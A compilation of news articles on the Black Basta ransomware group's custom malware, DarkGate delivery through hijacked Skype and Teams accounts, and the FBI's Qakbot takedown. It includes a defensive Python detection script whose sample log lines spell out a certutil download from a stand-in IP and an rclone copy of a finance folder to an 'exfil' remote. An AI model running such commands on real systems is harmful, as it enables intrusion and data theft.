
Black Basta Unleashes Custom Malware Following Qakbot Takedown



Following last year's takedown of the Qakbot botnet, the Black Basta ransomware group has shifted strategy, relying on new custom tools and initial access techniques. In the face of this year's efforts to curb ransomware gangs, Black Basta has shown considerable resilience and adaptability, adding custom tools and tactics developed to conceal its presence.

With over 500 victims compromised, the group's evolution illustrates how cybercriminals change tactics in response to law enforcement action and other disruptions, experts say. Despite those disruptions, they continue to flourish. Black Basta has attacked companies around the world since at least the second week of April 2022.

Little other information is currently available about the ransomware gang, since it has not advertised itself to the hacking community or recruited affiliates through hacking forums. Judging by how rapidly it accumulates new victims and how its negotiations are conducted, however, it is probably not a new operation; it is more likely a rebrand of a former top-tier ransomware gang that brought its affiliates along. The group uses a double-extortion strategy, combining data theft with encryption and demanding large ransom payments that can easily reach millions of dollars.

To gain access to corporate networks, the ransomware gang had earlier partnered with the QBot botnet. After law enforcement disrupted QBot, according to Mandiant, the gang had to form new partnerships in order to breach corporate networks. While tracking the threat actor as UNC4393, Mandiant has also identified new malware and tools used in Black Basta intrusions, showing the attackers' evolution and resilience.

Black Basta has had a busier year than most gangs, with its members compromising some of the largest companies and brands in the world, including Veolia North America, Hyundai Motor Europe, and Keytronic. One of the most telling signs of the group's sophistication is its access to zero-day exploits, such as an exploit for a Windows privilege elevation flaw (CVE-2024-26169) and one for a VMware ESXi authentication bypass flaw (CVE-2024-37085).

The most defining characteristic of Black Basta has been its prolific use of Qakbot, distributed through sophisticated, evolving phishing campaigns that gave rise to the group's reputation. Qakbot is a Trojan initially deployed to gain access to a victim's computer, after which it can deploy a wide array of open-source tools as well as the gang's name-branded ransomware, which is publicly available. After a year or so, the Qakbot botnet went mostly out of commission (though it has since resurfaced) as a result of the government law enforcement campaign called Operation Duck Hunt, forcing the group to find new ways of accessing victim infrastructure.

Mandiant's research team revealed in a blog post published this week that Black Basta initially used phishing and even vishing to spread other malware, such as DarkGate and Pikabot, but soon began looking for alternative methods to spread many more threats. According to Mandiant researchers in a post published last month, the group, tracked as UNC4393, has in recent attacks entered a phase of transition in which it no longer relies on readily available tools but develops custom malware, leans more heavily on access brokers and diversifies its initial access techniques.

After the FBI and DOJ shut down QBot's infrastructure in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering the DarkGate malware. Later, Black Basta switched to SilentNight, a backdoor delivery tool used for keylogging, to obtain initial access, marking a shift away from phishing as the primary method of accessing the network.

For example, one process by which the group gains initial access involves deploying a backdoor called SilentNight, which the group used in 2019 and 2021 but then put on hold until it was reactivated last year. Earlier this year, Black Basta also began incorporating malvertising into its operations, a significant departure from its earlier sole reliance on phishing for initial access. Cybersecurity researchers highlighted this shift in a detailed post, emphasizing the strategic evolution of Black Basta's methods.

SilentNight, a sophisticated C/C++ backdoor, has been identified as a critical component of Black Basta's recent campaigns. This malware communicates via HTTP/HTTPS and potentially employs a domain generation algorithm for its command and control (C2) infrastructure. The backdoor boasts a modular framework, which supports an array of plug-ins providing extensive functionality. These capabilities include system control, screenshot capture, keylogging, file management, and cryptocurrency wallet access. 

Notably, SilentNight also targets credentials through browser manipulation, making it a versatile and potent tool in Black Basta's arsenal. Upon gaining access to targeted environments, Black Basta employs a combination of living-off-the-land (LotL) techniques and custom malware to maintain persistence and facilitate lateral movement. This preparation stage precedes the deployment of ransomware. Researchers have noted that the ultimate objective of UNC4393, the group behind Black Basta, is to rapidly gather and exfiltrate as much data as possible. 

The collected data is then used in multi-faceted extortion schemes, where the threat of data leakage is leveraged to coerce victims into meeting ransom demands. Mandiant's latest report indicates a notable transition within Black Basta from the use of publicly available tools to the deployment of internally developed custom malware. This shift underscores the group’s adaptability and the ongoing threat it poses to organizations of all sizes. 

A security expert emphasized this resilience, pointing out that despite moving away from phishing, a highly successful cybercrime technique, Black Basta continues to present a significant risk. Erich Kron, a security awareness advocate at KnowBe4, commented on the group's operational capabilities, noting, "Given the success of this gang, there's no doubt they have a considerable amount of funds stocked away in their war chest, allowing them to develop their tools and improve their ability to attack."

This financial backing enables Black Basta to innovate continuously, enhancing its tools and techniques to outmanoeuvre defences. Mandiant researchers further stressed the importance for defenders to adopt a proactive stance, fortifying their security measures with cutting-edge technology and up-to-date threat intelligence. Black Basta's recent attacks have continued to exploit "living off the land" binaries and readily available tools, such as the Windows certutil command-line utility for downloading SilentNight and the Rclone tool for data exfiltration. 
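The two living-off-the-land behaviours named above, certutil used as a downloader and Rclone used for bulk data transfer, are the kind of thing a detection engineer would look for in process-creation telemetry. The following is an added example, not code from the article or from Mandiant: it runs a small classifier over constructed sample log lines in an assumed "host= user= parent= cmd=" format and flags the two patterns.

```python
import re
import shlex
from dataclasses import dataclass

# Constructed sample process-creation events (assumed log format, not real incident data).
SAMPLE_EVENTS = [
    '2024-06-03T10:14:02Z host=WS-17 user=jdoe parent=outlook.exe cmd=certutil.exe -urlcache -split -f http://203.0.113.5/update.dat C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.dat',
    '2024-06-03T10:16:40Z host=WS-17 user=jdoe parent=cmd.exe cmd=rclone.exe copy C:\\Finance remote:bucket/exfil --transfers 16',
    '2024-06-03T10:20:11Z host=WS-02 user=admin parent=mmc.exe cmd=certutil.exe -addstore Root C:\\certs\\corp-ca.cer',
    '2024-06-03T10:21:55Z host=WS-02 user=svc parent=services.exe cmd=rclone.exe version',
]

EVENT_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$')
URL_RE = re.compile(r'^https?://', re.I)
# An rclone remote looks like "name:path"; a Windows drive letter ("C:\...") must not match.
REMOTE_RE = re.compile(r'^[A-Za-z0-9_-]+:(?![\\/])')
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    technique: str
    cmd: str


def classify(cmd: str):
    """Return a technique label for a suspicious command line, else None."""
    argv = shlex.split(cmd, posix=False)  # non-posix keeps Windows backslashes intact
    if not argv:
        return None
    image = argv[0].strip('"').lower().rsplit('\\', 1)[-1]  # strip any path prefix
    switches = {a.lstrip('-/').lower() for a in argv[1:]}   # certutil accepts -x and /x
    if image == 'certutil.exe' and 'urlcache' in switches and any(URL_RE.match(a) for a in argv[1:]):
        return 'certutil download (ingress tool transfer)'
    if (image == 'rclone.exe' and len(argv) > 1 and argv[1].lower() in RCLONE_TRANSFER_VERBS
            and any(REMOTE_RE.match(a) for a in argv[2:])):
        return 'rclone transfer to remote (exfiltration)'
    return None


def detect(lines):
    """Parse each event line and collect findings for the two LotL patterns."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m is None:
            continue  # unparseable line; a real pipeline would count these
        technique = classify(m['cmd'])
        if technique:
            findings.append(Finding(m['ts'], m['host'], m['user'], technique, m['cmd']))
    return findings
```

Benign certutil certificate-store operations and non-transfer rclone invocations are deliberately left unflagged, which keeps the rule from drowning in false positives on admin workstations.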

In conclusion, Black Basta remains a formidable global threat and one of the leading entities in the ransomware landscape. Their ability to adapt and evolve necessitates vigilance and advanced defensive strategies from cybersecurity professionals worldwide.

Compromised Skype Accounts Facilitate DarkGate Malware Spread


Cyber attackers wielding the DarkGate malware have utilized compromised Skype accounts as a vector to infiltrate targets between July and September. They accomplished this by dispatching messages with VBA loader script attachments. 

Trend Micro's security researchers, who detected these attacks, noted that this script is responsible for fetching a second-stage AutoIT script. This script, in turn, is tailored to deploy the final DarkGate malware payload.

Trend Micro explained that gaining access to the victim's Skype account provided the attacker with the ability to take control of an ongoing messaging thread. This allowed them to manipulate the naming of files to align with the context of the conversation. 

Although the means by which the initial accounts of instant messaging applications were compromised remains unclear, it is theorized to have occurred either through leaked login credentials available on underground forums or as a consequence of a prior breach of the parent organization.

Furthermore, Trend Micro observed instances where DarkGate operators attempted to deliver their malware payload through Microsoft Teams. This occurred in organizations where the service was set up to accept messages from external users. 

Previously, Truesec and Malwarebytes had identified phishing campaigns targeting Microsoft Teams users. These campaigns used malicious VBScript to deploy the DarkGate malware. The attackers targeted users via compromised Office 365 accounts outside their respective organizations and leveraged a tool named TeamsPhisher.

This tool enabled the bypassing of restrictions on incoming files from external sources, enabling the transmission of phishing attachments to Teams users. The ultimate objective remained infiltrating the entire environment. Depending on the specific threat group employing the DarkGate variant, the threats ranged from ransomware to cryptomining.

Trend Micro's telemetry data indicated that DarkGate frequently led to the detection of tools commonly associated with the Black Basta ransomware group.

The use of the DarkGate malware loader for initial access into corporate networks has been on the rise, especially following the dismantling of the Qakbot botnet in August through an international collaborative effort.

Prior to the disruption of Qakbot, an individual claiming to be the developer of DarkGate sought to sell subscriptions on a hacking forum, pricing them at up to $100,000 annually. The malware was marketed with an array of features, including a concealed VNC, capabilities to evade Windows Defender, a tool for pilfering browser history, an integrated reverse proxy, a file manager, and a Discord token snatcher.

Subsequent to this announcement, there has been a noticeable surge in reported DarkGate infections via various delivery methods like phishing and malvertising.

This recent upswing in DarkGate activity highlights the escalating influence of this malware-as-a-service (MaaS) operation within the realm of cybercrime. It underscores the unwavering determination of threat actors to persist in their attacks, demonstrating adaptability in tactics and methods despite disruptions and obstacles.

FBI Operation: Qakbot Botnet Dismantled, Preventing Severe Ransomware Attacks


A global law enforcement operation executed by US investigators reportedly took down and dismantled the Qakbot botnet, preventing the severe blow of a ransomware scourge. 

On August 29, the Justice Department and FBI confirmed that they had taken down Qakbot by obtaining a search warrant to essentially take over the servers that ran the botnet. Federal agents then used the botnet itself to distribute a removal file to hundreds of computers, forcibly uninstalling the Qakbot malware from them.

In the investigation, the agencies found that Qakbot had access to over 700,000 infected computers, 200,000 of which were based in the US.

Qakbot Botnet

Qakbot, aka Qbot, initially commenced its operations in the year 2008, as a Windows-based Trojan designed to acquire access to targeted users’ bank account credentials. It was conventionally spread as malware attachments in phishing emails. 

The malware was also designed to build a botnet that would follow the commands of a hacker-controlled server. As a result, the Qakbot developers were able to charge other cybercriminal organizations for access to the hacked systems.

Those cybercrime organizations could then unleash ransomware on the affected systems or steal data from them. US authorities and security researchers have connected Qakbot to a number of ransomware gangs, including Conti, Black Basta, Royal, REvil, and LockBit, among others. In return, the unidentified Qakbot operators received fees tied to victim ransom payments totalling around $58 million. The botnet's operations are estimated to have caused hundreds of millions of dollars in total victim losses.

The Operation 

The application for the operation's seizure warrant describes how the FBI gained access to the servers running the Qakbot botnet infrastructure, hosted by an unnamed web hosting company, including systems used by the Qakbot operators.

The application further noted that, “Through its investigation, the FBI has gained a comprehensive understanding of the structure and function of the Qakbot botnet[…]Based on that knowledge, the FBI has developed a means to identify infected computers, collect information from them about the infection, disconnect them from the Qakbot botnet and prevent the Qakbot administrators from further communicating with those infected computers.”

Reportedly, Qakbot uses a three-tier network to control the malware installed on infected computers.

According to the FBI, Tier 1 systems are regular home or business computers that are infected with Qakbot and also carry an additional "supernode" module, making them part of the botnet's global command and control network. Many of these machines are situated in the United States. To hide the primary Tier 3 command and control server, which the administrators use to send encrypted commands to hundreds of thousands of infected workstations, Tier 1 computers communicate with Tier 2 systems, which act as proxies for network traffic.

By gaining access to these systems and Qakbot's encryption keys, the FBI could decode and better understand the encrypted commands. With the keys, the FBI could also command the Tier 1 "supernode" computers to replace the supernode module with one developed by the FBI containing new encryption keys, taking control of Qakbot away from its own administrators.

“Qakbot was the botnet of choice for some of the most infamous ransomware gangs, but we have now taken it out,” US Attorney Martin Estrada said in the announcement. 

The US is yet to provide further details on the issue. However, the Justice Department noted that “The FBI was able to redirect Qakbot botnet traffic to and through servers controlled by the FBI, which in turn instructed infected computers in the United States and elsewhere to download a file created by law enforcement that would uninstall the Qakbot malware.”